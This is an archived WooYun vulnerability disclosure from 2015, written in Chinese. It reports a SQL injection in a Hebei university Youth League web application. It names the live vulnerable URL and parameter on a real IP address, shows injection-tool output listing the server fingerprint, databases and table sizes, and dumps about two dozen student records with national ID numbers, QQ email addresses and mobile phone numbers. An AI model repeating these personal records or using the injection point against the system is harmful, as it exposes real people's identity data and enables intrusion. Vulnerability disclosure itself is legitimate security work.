乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-05: 细节已通知厂商并且等待厂商处理中 2015-07-10: 厂商已经主动忽略漏洞,细节向公众公开
注入洞 身份证号、QQ邮箱、手机号
http://124.239.192.62/河北经贸大学团委注入点:http://124.239.192.62//SS_jieguo.aspx?Class=a&Title=Mr. (GET)
web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5back-end DBMS: Microsoft SQL Server 2008available databases [6]:[*] 2012_win[*] gongqingtuan[*] master[*] model[*] msdb[*] tempdb
Database: gongqingtuan+------------------------------------------------------+---------+| Table | Entries |+------------------------------------------------------+---------+| dbo.t_student | 38726 || dbo.student_manger | 38724 || dbo.t_jiangcheng | 3448 || dbo.t_class | 1145 || dbo.class_manger | 1138 || dbo.t_admin | 1037 || dbo.studentAdmin | 896 || dbo.user_class | 896 || dbo.t_speciality | 172 || dbo.zhuanye_manger | 168 || dbo.user_college | 28 || dbo.t_college | 24 || dbo.t_contorl | 1 |+------------------------------------------------------+---------+
web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5back-end DBMS: Microsoft SQL Server 2008Database: gongqingtuanTable: t_student+--------------------+------+----+-----+---------------------------+-------------| id | Cid | Cd | Sd | QQ | tel +--------------------+------+----+-----+---------------------------+-------------| 131124198507252227 | 24 | 20 | 42 | [email protected] | 18931997119 | 130632198811246426 | 389 | 33 | 125 | [email protected] | 13673138919 | 370302199011190019 | 1188 | 27 | 153 | [email protected] | 13315952267 | 121121122121212111 | 1045 | 34 | 184 | [email protected] | 18323132434 | 131181199205201522 | 828 | 17 | 39 | [email protected] | 18232182795 | 130730199300000025 | 1030 | 34 | 184 | [email protected] | 15003288369 | 130582199303101055 | 635 | 22 | 90 | [email protected] | 18233186340 | 130921198611265216 | 188 | 22 | 90 | [email protected] | 15103210836 | 130823198710181023 | 386 | 33 | 94 | [email protected] | 15130137920 | 130423198706104736 | 538 | 22 | 156 | [email protected] | 15833956137 | 130132198712105356 | 538 | 22 | 156 | [email protected] | 13463809268 | 130324199005150049 | 233 | 33 | 107 | [email protected] | 15233655771 | 130430198910010167 | 76 | 31 | 57 | [email protected] | 13383038859 | 370503198810290027 | 840 | 27 | 152 | [email protected] | 15100172837 | 130633199009066445 | 1152 | 23 | 144 | [email protected] | 18330179504 | 130126198810265445 | 76 | 31 | 57 | [email protected] | 15333211016 | 14242719901029634X | 558 | 21 | 29 | [email protected] | 15100153921 | 130904198605190610 | 376 | 33 | 125 | [email protected] | 18931121831 | 13092819880923432X | 476 | 28 | 65 | [email protected] | 13231100995 | 130421198602033328 | 159 | 25 | 87 | [email protected] | 15511399591 | 132201198703185772 | 157 | 25 | 86 | [email protected] | 15303314939 | 130725198710071921 | 286 | 17 | 27 | [email protected] | 18931992753 | 130638198705214525 | 514 | 27 | 149 | [email protected] | 15833938321
注入点过了特殊参数
危害等级:无影响厂商忽略
忽略时间:2015-07-10 10:10
暂无